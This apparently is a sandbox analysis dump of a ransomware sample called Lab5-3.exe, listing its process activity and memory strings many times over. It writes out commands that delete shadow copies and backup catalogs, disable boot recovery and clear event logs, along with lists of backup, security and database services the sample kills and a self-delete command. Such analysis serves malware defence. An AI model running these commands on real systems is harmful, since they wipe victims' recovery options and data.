stoppedwrapperDefWatchccEvtMgrccSetMgrSavRoamSqlservrsqlagentsqladhlpCulserverRTVscansqlbrowserSQLADHLPQBIDPServiceIntuit.QuickBooks.FCSQBCFMonitorServicesqlwritermsmdsrvtomcat6zhudongfangyuvmware-usbarbitator64vmware-converterdbsrv12dbeng8MSSQL$MICROSOFT##WIDMSSQL$VEEAMSQL2012SQLAgent$VEEAMSQL2012SQLBrowserSQLWriterFishbowlMySQLMSSQL$MICROSOFT##WIDMySQL57MSSQL$KAV_CS_ADMIN_KITMSSQLServerADHelper100SQLAgent$KAV_CS_ADMIN_KITmsftesql-ExchangeMSSQL$MICROSOFT##SSEEMSSQL$SBSMONITORINGMSSQL$SHAREPOINTMSSQLFDLauncher$SBSMONITORINGMSSQLFDLauncher$SHAREPOINTSQLAgent$SBSMONITORINGSQLAgent$SHAREPOINTQBFCServiceQBVSSYooBackupYooITvsssqlsvc$MSSQLMSSQL$memtasmepocssophosveeambackupbedbgPDVFSServiceBackupExecVSSProviderBackupExecAgentAcceleratorBackupExecAgentBrowserBackupExecDiveciMediaServiceBackupExecJobEngineBackupExecManagementServiceBackupExecRPCServiceMVArmorMVarmor64stc_raw_agentVSNAPVSSVeeamTransportSvcVeeamDeploymentServiceVeeamNFSSvcAcronisAgentARSMAcrSch2SvcCASAD2DWebSvcCAARCUpdateSvcWSBExchangeMSExchangeMSExchange$Service %s stoppedService %s stoppedService %s stoppedcmd.exerunas/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietwxServerwxServerViewsqlmangrRAguisuperviseCultureDefwatchwinwordQBW32QBDBMgrqbupdateaxlbridgehttpdfdlauncherMsDtSrvrjava360se360doctorwdswfsafefdhostGDscanZhuDongFangYuQBDBMgrNmysqldAutodeskDesktopAppacwebbrowserCreative CloudAdobe Desktop ServiceCoreSyncAdobe CEF HelpernodeAdobeIPCBrokersync-taskbarsync-workerInputPersonalizationAdobeCollabSyncBrCtrlCntrBrCcUxSysSimplyConnectionManagerSimply.SystemTrayIconfbguardfbserverONENOTEMwsa_servicekoaly-exp-engine-serviceTeamViewer_ServiceTeamViewertv_w32tv_x64TitanVSsmsnotepadRdrCEFsamoracleocssddbsnmpsynctimeagntsvcisqlplussvcxfssvcconmydesktopserviceocautoupdsencsvcfirefoxtbirdconfigmydesktopqosocommdbeng50sqbcoreserviceexcelinfopathmsaccessmspubonenoteoutlookpowerpntsteamthebatthunderbirdvisiowordpadbedbhvxmonbenetnsbengienpvlsvrbeserverraw_agent_svcvsnapvssCagServiceDellSystemDetectEnterpriseClientVeeamDeploymentSvcKilled process: %s [pid: %ld]Wow64DisableWow64FsRedirectionkernel32/c vssadmin Delete Shadows /All /Quiet/c bcdedit /set {default} recoveryenabled No/c bcdedit /set {default} bootstatuspolicy ignoreallfailures/c wbadmin DELETE SYSTEMSTATEBACKUP/c wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest/c wmic SHADOWCOPY /nointeractive/c wevtutil c
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quiet
                      Source: Lab5-3.exe, 0000001B.00000002.3764952965.00000000007B4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /c vssadmin Delete Shadows /All /Quiet7d
                      Source: Lab5-3.exe, 0000001B.00000003.2069317377.0000000019161000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
                      Source: Lab5-3.exe, 0000001B.00000003.2028174332.0000000019161000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
                      Source: Lab5-3.exe, 0000001B.00000003.2549739906.0000000019161000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
                      Source: Lab5-3.exe, 0000001B.00000003.2038992238.00000000007BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /c vssadmin Delete Shadows /All /Quiet7d
                      Source: Lab5-3.exe, 0000001B.00000002.3750630560.000000000041B000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
                      Source: Lab5-3.exe, 0000001B.00000002.3750630560.000000000041B000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: /c vssadmin Delete Shadows /All /Quiet
                      Source: Lab5-3.exe, 0000001B.00000002.3750630560.000000000041B000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: For more information see Restore-My-Files.txt that is located in every encrypted folder08:15:1008:15:10GenuineIntelAuthenticAMDGlobal\{02B49784-1CA2-436C-BC08-72FA3956507D}Global\{BEF590BE-11A6-442A-A85B-656C1081E04C}SeDebugPrivilegeDebug Privilege: OK08:15:10Local time: %d.%d %d:%dPC: %s08:15:12cmd.exeRemoved autorun key /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 "%s" & Del /f /q "%s"SOFTWARE\Microsoft\Windows\CurrentVersion\RunXO1XADpO01"%s"Service %s stoppedwrapperDefWatchccEvtMgrccSetMgrSavRoamSqlservrsqlagentsqladhlpCulserverRTVscansqlbrowserSQLADHLPQBIDPServiceIntuit.QuickBooks.FCSQBCFMonitorServicesqlwritermsmdsrvtomcat6zhudongfangyuvmware-usbarbitator64vmware-converterdbsrv12dbeng8MSSQL$MICROSOFT##WIDMSSQL$VEEAMSQL2012SQLAgent$VEEAMSQL2012SQLBrowserSQLWriterFishbowlMySQLMSSQL$MICROSOFT##WIDMySQL57MSSQL$KAV_CS_ADMIN_KITMSSQLServerADHelper100SQLAgent$KAV_CS_ADMIN_KITmsftesql-ExchangeMSSQL$MICROSOFT##SSEEMSSQL$SBSMONITORINGMSSQL$SHAREPOINTMSSQLFDLauncher$SBSMONITORINGMSSQLFDLauncher$SHAREPOINTSQLAgent$SBSMONITORINGSQLAgent$SHAREPOINTQBFCServiceQBVSSYooBackupYooITvsssqlsvc$MSSQLMSSQL$memtasmepocssophosveeambackupbedbgPDVFSServiceBackupExecVSSProviderBackupExecAgentAcceleratorBackupExecAgentBrowserBackupExecDiveciMediaServiceBackupExecJobEngineBackupExecManagementServiceBackupExecRPCServiceMVArmorMVarmor64stc_raw_agentVSNAPVSSVeeamTransportSvcVeeamDeploymentServiceVeeamNFSSvcAcronisAgentARSMAcrSch2SvcCASAD2DWebSvcCAARCUpdateSvcWSBExchangeMSExchangeMSExchange$Service %s stoppedService %s stoppedService %s stoppedcmd.exerunas/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietwxServerwxServerViewsqlmangrRAguisuperviseCultureDefwatchwinwordQBW32QBDBMgrqbupdateaxlbridgehttpdfdlauncherMsDtSrvrjava360se360doctorwdswfsafefdhostGDscanZhuDongFangYuQBDBMgrNmysqldAutodeskDesktopAppacwebbrowserCreative CloudAdobe Desktop ServiceCoreSyncAdobe CEF HelpernodeAdobeIPCBrokersync-taskbarsync-workerInputPersonalizationAdobeCollabSyncBrCtrlCntrBrCcUxSysSimplyConnectionManagerSimply.SystemTrayIconfbguardfbserverONENOTEMwsa_servicekoaly-exp-engine-serviceTeamViewer_ServiceTeamViewertv_w32tv_x64TitanVSsmsnotepadRdrCEFsamoracleocssddbsnmpsynctimeagntsvcisqlplussvcxfssvcconmydesktopserviceocautoupdsencsvcfirefoxtbirdconfigmydesktopqosocommdbeng50sqbcoreserviceexcelinfopathmsaccessmspubonenoteoutlookpowerpntsteamthebatthunderbirdvisiowordpadbedbhvxmonbenetnsbengienpvlsvrbeserverraw_agent_svcvsnapvssCagServiceDellSystemDetectEnterpriseClientVeeamDeploymentSvcKilled process: %s [pid: %ld]Wow64DisableWow64FsRedirectionkernel32/c vssadmin Delete Shadows /All /Quiet/c bcdedit /set {default} recoveryenabled No/c bcdedit /set {default} bootstatuspolicy ignoreallfailures/c wbadmin DELETE SYSTEMSTATEBACKUP/c wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest/c wmic SHADOWCOPY /nointeractive/c wevtutil c
                      Source: Lab5-3.exe, 0000001B.00000003.2046471898.0000000019161000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
                      Source: Lab5-3.exe, 0000001B.00000003.2050781909.0000000019161000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
                      Source: Lab5-3.exe, 0000001B.00000003.2890371108.0000000019161000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
                      Source: Lab5-3.exe, 0000001B.00000000.1820658246.000000000041B000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
                      Source: Lab5-3.exe, 0000001B.00000000.1820658246.000000000041B000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: /c vssadmin Delete Shadows /All /Quiet
                      Source: Lab5-3.exe, 0000001B.00000000.1820658246.000000000041B000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: For more information see Restore-My-Files.txt that is located in every encrypted folder08:15:1008:15:10GenuineIntelAuthenticAMDGlobal\{02B49784-1CA2-436C-BC08-72FA3956507D}Global\{BEF590BE-11A6-442A-A85B-656C1081E04C}SeDebugPrivilegeDebug Privilege: OK08:15:10Local time: %d.%d %d:%dPC: %s08:15:12cmd.exeRemoved autorun key /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 "%s" & Del /f /q "%s"SOFTWARE\Microsoft\Windows\CurrentVersion\RunXO1XADpO01"%s"Service %s stoppedwrapperDefWatchccEvtMgrccSetMgrSavRoamSqlservrsqlagentsqladhlpCulserverRTVscansqlbrowserSQLADHLPQBIDPServiceIntuit.QuickBooks.FCSQBCFMonitorServicesqlwritermsmdsrvtomcat6zhudongfangyuvmware-usbarbitator64vmware-converterdbsrv12dbeng8MSSQL$MICROSOFT##WIDMSSQL$VEEAMSQL2012SQLAgent$VEEAMSQL2012SQLBrowserSQLWriterFishbowlMySQLMSSQL$MICROSOFT##WIDMySQL57MSSQL$KAV_CS_ADMIN_KITMSSQLServerADHelper100SQLAgent$KAV_CS_ADMIN_KITmsftesql-ExchangeMSSQL$MICROSOFT##SSEEMSSQL$SBSMONITORINGMSSQL$SHAREPOINTMSSQLFDLauncher$SBSMONITORINGMSSQLFDLauncher$SHAREPOINTSQLAgent$SBSMONITORINGSQLAgent$SHAREPOINTQBFCServiceQBVSSYooBackupYooITvsssqlsvc$MSSQLMSSQL$memtasmepocssophosveeambackupbedbgPDVFSServiceBackupExecVSSProviderBackupExecAgentAcceleratorBackupExecAgentBrowserBackupExecDiveciMediaServiceBackupExecJobEngineBackupExecManagementServiceBackupExecRPCServiceMVArmorMVarmor64stc_raw_agentVSNAPVSSVeeamTransportSvcVeeamDeploymentServiceVeeamNFSSvcAcronisAgentARSMAcrSch2SvcCASAD2DWebSvcCAARCUpdateSvcWSBExchangeMSExchangeMSExchange$Service %s stoppedService %s stoppedService %s stoppedcmd.exerunas/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietwxServerwxServerViewsqlmangrRAguisuperviseCultureDefwatchwinwordQBW32QBDBMgrqbupdateaxlbridgehttpdfdlauncherMsDtSrvrjava360se360doctorwdswfsafefdhostGDscanZhuDongFangYuQBDBMgrNmysqldAutodeskDesktopAppacwebbrowserCreative CloudAdobe Desktop ServiceCoreSyncAdobe CEF HelpernodeAdobeIPCBrokersync-taskbarsync-workerInputPersonalizationAdobeCollabSyncBrCtrlCntrBrCcUxSysSimplyConnectionManagerSimply.SystemTrayIconfbguardfbserverONENOTEMwsa_servicekoaly-exp-engine-serviceTeamViewer_ServiceTeamViewertv_w32tv_x64TitanVSsmsnotepadRdrCEFsamoracleocssddbsnmpsynctimeagntsvcisqlplussvcxfssvcconmydesktopserviceocautoupdsencsvcfirefoxtbirdconfigmydesktopqosocommdbeng50sqbcoreserviceexcelinfopathmsaccessmspubonenoteoutlookpowerpntsteamthebatthunderbirdvisiowordpadbedbhvxmonbenetnsbengienpvlsvrbeserverraw_agent_svcvsnapvssCagServiceDellSystemDetectEnterpriseClientVeeamDeploymentSvcKilled process: %s [pid: %ld]Wow64DisableWow64FsRedirectionkernel32/c vssadmin Delete Shadows /All /Quiet/c bcdedit /set {default} recoveryenabled No/c bcdedit /set {default} bootstatuspolicy ignoreallfailures/c wbadmin DELETE SYSTEMSTATEBACKUP/c wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest/c wmic SHADOWCOPY /nointeractive/c wevtutil c
                      Source: Lab5-3.exe, 0000001B.00000003.2157404991.0000000000738000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /c vssadmin Delete Shadows /All /Quiet
                      Source: Lab5-3.exe, 0000001B.00000003.2091016379.0000000019161000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
                      Source: Lab5-3.exe, 0000001B.00000003.3463789215.0000000019161000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quiet
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic shadowcopy delete
                      Source: vssadmin.exe, 00000020.00000002.1861769176.000002BAC98E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Windows\system32\C:\Windows\system32\vssadmin.exevssadmin delete shadows /all /quiet vssadmin delete shadows /all /quiet WinSta0\Defaultw
                      Source: vssadmin.exe, 00000020.00000002.1861769176.000002BAC98E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vssadmin delete shadows /all /quiet
                      Source: vssadmin.exe, 00000020.00000002.1861769176.000002BAC98E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vssadmin delete shadows /all /quiet 3
                      Source: vssadmin.exe, 00000020.00000002.1862310685.000002BAC9B85000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vssadmindeleteshadows/all/quietB
                      Source: Lab5-3.exe, 00000022.00000002.1879653667.000000000041B000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
                      Source: Lab5-3.exe, 00000022.00000002.1879653667.000000000041B000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: /c vssadmin Delete Shadows /All /Quiet
                      Source: Lab5-3.exe, 00000022.00000002.1879653667.000000000041B000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: For more information see Restore-My-Files.txt that is located in every encrypted folder08:15:1008:15:10GenuineIntelAuthenticAMDGlobal\{02B49784-1CA2-436C-BC08-72FA3956507D}Global\{BEF590BE-11A6-442A-A85B-656C1081E04C}SeDebugPrivilegeDebug Privilege: OK08:15:10Local time: %d.%d %d:%dPC: %s08:15:12cmd.exeRemoved autorun key /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 "%s" & Del /f /q "%s"SOFTWARE\Microsoft\Windows\CurrentVersion\RunXO1XADpO01"%s"Service %s stoppedwrapperDefWatchccEvtMgrccSetMgrSavRoamSqlservrsqlagentsqladhlpCulserverRTVscansqlbrowserSQLADHLPQBIDPServiceIntuit.QuickBooks.FCSQBCFMonitorServicesqlwritermsmdsrvtomcat6zhudongfangyuvmware-usbarbitator64vmware-converterdbsrv12dbeng8MSSQL$MICROSOFT##WIDMSSQL$VEEAMSQL2012SQLAgent$VEEAMSQL2012SQLBrowserSQLWriterFishbowlMySQLMSSQL$MICROSOFT##WIDMySQL57MSSQL$KAV_CS_ADMIN_KITMSSQLServerADHelper100SQLAgent$KAV_CS_ADMIN_KITmsftesql-ExchangeMSSQL$MICROSOFT##SSEEMSSQL$SBSMONITORINGMSSQL$SHAREPOINTMSSQLFDLauncher$SBSMONITORINGMSSQLFDLauncher$SHAREPOINTSQLAgent$SBSMONITORINGSQLAgent$SHAREPOINTQBFCServiceQBVSSYooBackupYooITvsssqlsvc$MSSQLMSSQL$memtasmepocssophosveeambackupbedbgPDVFSServiceBackupExecVSSProviderBackupExecAgentAcceleratorBackupExecAgentBrowserBackupExecDiveciMediaServiceBackupExecJobEngineBackupExecManagementServiceBackupExecRPCServiceMVArmorMVarmor64stc_raw_agentVSNAPVSSVeeamTransportSvcVeeamDeploymentServiceVeeamNFSSvcAcronisAgentARSMAcrSch2SvcCASAD2DWebSvcCAARCUpdateSvcWSBExchangeMSExchangeMSExchange$Service %s stoppedService %s stoppedService %s stoppedcmd.exerunas/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietwxServerwxServerViewsqlmangrRAguisuperviseCultureDefwatchwinwordQBW32QBDBMgrqbupdateaxlbridgehttpdfdlauncherMsDtSrvrjava360se360doctorwdswfsafefdhostGDscanZhuDongFangYuQBDBMgrNmysqldAutodeskDesktopAppacwebbrowserCreative CloudAdobe Desktop ServiceCoreSyncAdobe CEF HelpernodeAdobeIPCBrokersync-taskbarsync-workerInputPersonalizationAdobeCollabSyncBrCtrlCntrBrCcUxSysSimplyConnectionManagerSimply.SystemTrayIconfbguardfbserverONENOTEMwsa_servicekoaly-exp-engine-serviceTeamViewer_ServiceTeamViewertv_w32tv_x64TitanVSsmsnotepadRdrCEFsamoracleocssddbsnmpsynctimeagntsvcisqlplussvcxfssvcconmydesktopserviceocautoupdsencsvcfirefoxtbirdconfigmydesktopqosocommdbeng50sqbcoreserviceexcelinfopathmsaccessmspubonenoteoutlookpowerpntsteamthebatthunderbirdvisiowordpadbedbhvxmonbenetnsbengienpvlsvrbeserverraw_agent_svcvsnapvssCagServiceDellSystemDetectEnterpriseClientVeeamDeploymentSvcKilled process: %s [pid: %ld]Wow64DisableWow64FsRedirectionkernel32/c vssadmin Delete Shadows /All /Quiet/c bcdedit /set {default} recoveryenabled No/c bcdedit /set {default} bootstatuspolicy ignoreallfailures/c wbadmin DELETE SYSTEMSTATEBACKUP/c wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest/c wmic SHADOWCOPY /nointeractive/c wevtutil c
                      Source: Lab5-3.exe, 00000022.00000000.1853803315.000000000041B000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
                      Source: Lab5-3.exe, 00000022.00000000.1853803315.000000000041B000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: /c vssadmin Delete Shadows /All /Quiet
                      Source: Lab5-3.exe, 00000022.00000000.1853803315.000000000041B000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: For more information see Restore-My-Files.txt that is located in every encrypted folder08:15:1008:15:10GenuineIntelAuthenticAMDGlobal\{02B49784-1CA2-436C-BC08-72FA3956507D}Global\{BEF590BE-11A6-442A-A85B-656C1081E04C}SeDebugPrivilegeDebug Privilege: OK08:15:10Local time: %d.%d %d:%dPC: %s08:15:12cmd.exeRemoved autorun key /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 "%s" & Del /f /q "%s"SOFTWARE\Microsoft\Windows\CurrentVersion\RunXO1XADpO01"%s"Service %s stoppedwrapperDefWatchccEvtMgrccSetMgrSavRoamSqlservrsqlagentsqladhlpCulserverRTVscansqlbrowserSQLADHLPQBIDPServiceIntuit.QuickBooks.FCSQBCFMonitorServicesqlwritermsmdsrvtomcat6zhudongfangyuvmware-usbarbitator64vmware-converterdbsrv12dbeng8MSSQL$MICROSOFT##WIDMSSQL$VEEAMSQL2012SQLAgent$VEEAMSQL2012SQLBrowserSQLWriterFishbowlMySQLMSSQL$MICROSOFT##WIDMySQL57MSSQL$KAV_CS_ADMIN_KITMSSQLServerADHelper100SQLAgent$KAV_CS_ADMIN_KITmsftesql-ExchangeMSSQL$MICROSOFT##SSEEMSSQL$SBSMONITORINGMSSQL$SHAREPOINTMSSQLFDLauncher$SBSMONITORINGMSSQLFDLauncher$SHAREPOINTSQLAgent$SBSMONITORINGSQLAgent$SHAREPOINTQBFCServiceQBVSSYooBackupYooITvsssqlsvc$MSSQLMSSQL$memtasmepocssophosveeambackupbedbgPDVFSServiceBackupExecVSSProviderBackupExecAgentAcceleratorBackupExecAgentBrowserBackupExecDiveciMediaServiceBackupExecJobEngineBackupExecManagementServiceBackupExecRPCServiceMVArmorMVarmor64stc_raw_agentVSNAPVSSVeeamTransportSvcVeeamDeploymentServiceVeeamNFSSvcAcronisAgentARSMAcrSch2SvcCASAD2DWebSvcCAARCUpdateSvcWSBExchangeMSExchangeMSExchange$Service %s stoppedService %s stoppedService %s stoppedcmd.exerunas/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietwxServerwxServerViewsqlmangrRAguisuperviseCultureDefwatchwinwordQBW32QBDBMgrqbupdateaxlbridgehttpdfdlauncherMsDtSrvrjava360se360doctorwdswfsafefdhostGDscanZhuDongFangYuQBDBMgrNmysqldAutodeskDesktopAppacwebbrowserCreative CloudAdobe Desktop ServiceCoreSyncAdobe CEF HelpernodeAdobeIPCBrokersync-taskbarsync-workerInputPersonalizationAdobeCollabSyncBrCtrlCntrBrCcUxSysSimplyConnectionManagerSimply.SystemTrayIconfbguardfbserverONENOTEMwsa_servicekoaly-exp-engine-serviceTeamViewer_ServiceTeamViewertv_w32tv_x64TitanVSsmsnotepadRdrCEFsamoracleocssddbsnmpsynctimeagntsvcisqlplussvcxfssvcconmydesktopserviceocautoupdsencsvcfirefoxtbirdconfigmydesktopqosocommdbeng50sqbcoreserviceexcelinfopathmsaccessmspubonenoteoutlookpowerpntsteamthebatthunderbirdvisiowordpadbedbhvxmonbenetnsbengienpvlsvrbeserverraw_agent_svcvsnapvssCagServiceDellSystemDetectEnterpriseClientVeeamDeploymentSvcKilled process: %s [pid: %ld]Wow64DisableWow64FsRedirectionkernel32/c vssadmin Delete Shadows /All /Quiet/c bcdedit /set {default} recoveryenabled No/c bcdedit /set {default} bootstatuspolicy ignoreallfailures/c wbadmin DELETE SYSTEMSTATEBACKUP/c wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest/c wmic SHADOWCOPY /nointeractive/c wevtutil c
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
                      Source: Lab5-3.exe, 00000028.00000002.3209902730.000000000041B000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
                      Source: Lab5-3.exe, 00000028.00000002.3209902730.000000000041B000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: /c vssadmin Delete Shadows /All /Quiet
                      Source: Lab5-3.exe, 00000028.00000002.3209902730.000000000041B000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: For more information see Restore-My-Files.txt that is located in every encrypted folder08:15:1008:15:10GenuineIntelAuthenticAMDGlobal\{02B49784-1CA2-436C-BC08-72FA3956507D}Global\{BEF590BE-11A6-442A-A85B-656C1081E04C}SeDebugPrivilegeDebug Privilege: OK08:15:10Local time: %d.%d %d:%dPC: %s08:15:12cmd.exeRemoved autorun key /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 "%s" & Del /f /q "%s"SOFTWARE\Microsoft\Windows\CurrentVersion\RunXO1XADpO01"%s"Service %s stoppedwrapperDefWatchccEvtMgrccSetMgrSavRoamSqlservrsqlagentsqladhlpCulserverRTVscansqlbrowserSQLADHLPQBIDPServiceIntuit.QuickBooks.FCSQBCFMonitorServicesqlwritermsmdsrvtomcat6zhudongfangyuvmware-usbarbitator64vmware-converterdbsrv12dbeng8MSSQL$MICROSOFT##WIDMSSQL$VEEAMSQL2012SQLAgent$VEEAMSQL2012SQLBrowserSQLWriterFishbowlMySQLMSSQL$MICROSOFT##WIDMySQL57MSSQL$KAV_CS_ADMIN_KITMSSQLServerADHelper100SQLAgent$KAV_CS_ADMIN_KITmsftesql-ExchangeMSSQL$MICROSOFT##SSEEMSSQL$SBSMONITORINGMSSQL$SHAREPOINTMSSQLFDLauncher$SBSMONITORINGMSSQLFDLauncher$SHAREPOINTSQLAgent$SBSMONITORINGSQLAgent$SHAREPOINTQBFCServiceQBVSSYooBackupYooITvsssqlsvc$MSSQLMSSQL$memtasmepocssophosveeambackupbedbgPDVFSServiceBackupExecVSSProviderBackupExecAgentAcceleratorBackupExecAgentBrowserBackupExecDiveciMediaServiceBackupExecJobEngineBackupExecManagementServiceBackupExecRPCServiceMVArmorMVarmor64stc_raw_agentVSNAPVSSVeeamTransportSvcVeeamDeploymentServiceVeeamNFSSvcAcronisAgentARSMAcrSch2SvcCASAD2DWebSvcCAARCUpdateSvcWSBExchangeMSExchangeMSExchange$Service %s stoppedService %s stoppedService %s stoppedcmd.exerunas/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietwxServerwxServerViewsqlmangrRAguisuperviseCultureDefwatchwinwordQBW32QBDBMgrqbupdateaxlbridgehttpdfdlauncherMsDtSrvrjava360se360doctorwdswfsafefdhostGDscanZhuDongFangYuQBDBMgrNmysqldAutodeskDesktopAppacwebbrowserCreative CloudAdobe Desktop ServiceCoreSyncAdobe CEF HelpernodeAdobeIPCBrokersync-taskbarsync-workerInputPersonalizationAdobeCollabSyncBrCtrlCntrBrCcUxSysSimplyConnectionManagerSimply.SystemTrayIconfbguardfbserverONENOTEMwsa_servicekoaly-exp-engine-serviceTeamViewer_ServiceTeamViewertv_w32tv_x64TitanVSsmsnotepadRdrCEFsamoracleocssddbsnmpsynctimeagntsvcisqlplussvcxfssvcconmydesktopserviceocautoupdsencsvcfirefoxtbirdconfigmydesktopqosocommdbeng50sqbcoreserviceexcelinfopathmsaccessmspubonenoteoutlookpowerpntsteamthebatthunderbirdvisiowordpadbedbhvxmonbenetnsbengienpvlsvrbeserverraw_agent_svcvsnapvssCagServiceDellSystemDetectEnterpriseClientVeeamDeploymentSvcKilled process: %s [pid: %ld]Wow64DisableWow64FsRedirectionkernel32/c vssadmin Delete Shadows /All /Quiet/c bcdedit /set {default} recoveryenabled No/c bcdedit /set {default} bootstatuspolicy ignoreallfailures/c wbadmin DELETE SYSTEMSTATEBACKUP/c wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest/c wmic SHADOWCOPY /nointeractive/c wevtutil c
